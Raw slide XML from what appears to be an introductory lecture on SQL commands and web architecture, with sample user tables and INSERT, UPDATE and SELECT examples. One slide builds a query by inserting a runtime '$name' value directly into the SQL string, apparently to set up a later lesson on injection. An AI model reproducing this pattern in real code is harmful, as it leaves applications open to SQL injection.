            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>DROP – remove an entire column, table, etc.</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SELECT – retrieve information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE – extract data that meets a condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Shape 517"/>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Shape 523"/>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Sample Database: Users Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Shape 524"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="34375"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Shape 52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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1228725" y="1417650"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1057850"/>
                <a:gridCol w="683300"/>
                <a:gridCol w="1972750"/>
                <a:gridCol w="1434700"/>
                <a:gridCol w="1159000"/>
              </a:tblGrid>
              <a:tr h="526100">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Alice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123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Bob</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345 Campbell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Cat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567 Frankford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Kathy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66</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111 Plano Parkway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42000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261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George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121 Greenville Avenue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67000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solidFill>
                      <a:srgbClr val="F9F9F9"/>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Shape 53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Sample Database: Project Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Shape 533"/>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534" name="Shape 53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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="764850" y="2028113"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2252575"/>
                <a:gridCol w="2998125"/>
                <a:gridCol w="2363600"/>
              </a:tblGrid>
              <a:tr h="589200">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pnumber</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plocation</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Project X</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2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Project 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Project Z</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Houston</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2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Middleware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Austin</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Lazer Printers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Shape 541"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44175" y="97375"/>
            <a:ext cx="9099600" cy="1320300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>into Users(name, age, address, salary, pnum) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>values ("Jack", 43, "124 Park Street", 50000, 4);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Shape 542"/>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0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Shape 54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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="44175" y="1466325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="682550"/>
                <a:gridCol w="450500"/>
                <a:gridCol w="1272875"/>
                <a:gridCol w="925675"/>
                <a:gridCol w="747775"/>
              </a:tblGrid>
              <a:tr h="483300">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4833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Alice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123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6766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Bob</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345 Campbell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6766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Cat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567 Frankford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4833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6766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Kathy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66</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111 Plano Parkway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42000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6766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George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121 Greenville Avenue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67000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solidFill>
                      <a:srgbClr val="F9F9F9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="545" name="Shape 545"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4458500" y="1509713"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="728600"/>
                <a:gridCol w="472250"/>
                <a:gridCol w="1821500"/>
                <a:gridCol w="674650"/>
                <a:gridCol w="616150"/>
              </a:tblGrid>
              <a:tr h="589025">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Alice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123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Bob</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345 Campbell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Cat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567 Frankford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Kathy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66</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111 Plano Parkway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42000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George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121 Greenville Avenue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67000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Jack</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43</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124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
        <p:nvSpPr>
          <p:cNvPr id="546" name="Shape 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451450" y="5647775"/>
            <a:ext cx="4312200" cy="5565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Shape 55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lgn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pdate Users set salary = 60000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>where name = “Bob”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553"/>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554" name="Shape 55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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="555" name="Shape 555"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="83125" y="1507138"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="728600"/>
                <a:gridCol w="472250"/>
                <a:gridCol w="1821500"/>
                <a:gridCol w="674650"/>
                <a:gridCol w="616150"/>
              </a:tblGrid>
              <a:tr h="589025">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Alice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123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Bob</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345 Campbell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Cat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567 Frankford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Kathy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66</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111 Plano Parkway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42000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George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121 Greenville Avenue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67000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0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Jack</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43</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124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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="556" name="Shape 556"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4589325" y="1530488"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="751700"/>
                <a:gridCol w="487225"/>
                <a:gridCol w="1879250"/>
                <a:gridCol w="696025"/>
                <a:gridCol w="635700"/>
              </a:tblGrid>
              <a:tr h="550725">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Alice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123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Bob</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25</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345 Campbell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Cat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567 Frankford Road</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Kathy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66</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111 Plano Parkway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42000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George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62</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121 Greenville Avenue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67000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675400">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Jack</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43</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124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4</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
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3102100" y="2698675"/>
            <a:ext cx="667800" cy="5703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558" name="Shape 558"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722479" y="2698675"/>
            <a:ext cx="667800" cy="5703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Shape 563"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To select a user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sers WHERE name = 'Bob';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The username is determined at runtime, so let’s make it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-7619" lvl="0" marL="45720" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sers WHERE name = '$name';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-7619" lvl="0" marL="45720" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For example, if $name is “Joe”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-7619" lvl="0" marL="45720" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sers WHERE name = 'Joe';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 565"/>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Web Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 129"/>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Diagram of full web architecture, animate circle over basic client/server interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>focus on static webpages first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 130"/>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Web-Application-Architecture.png" id="131" name="Shape 131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="17790"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1738613"/>
            <a:ext cx="8229600" cy="3104862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7549875" y="1674450"/>
            <a:ext cx="1173600" cy="15456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2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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 572"/>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rPr lang="en-US"/>
              <a:t>Result of query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
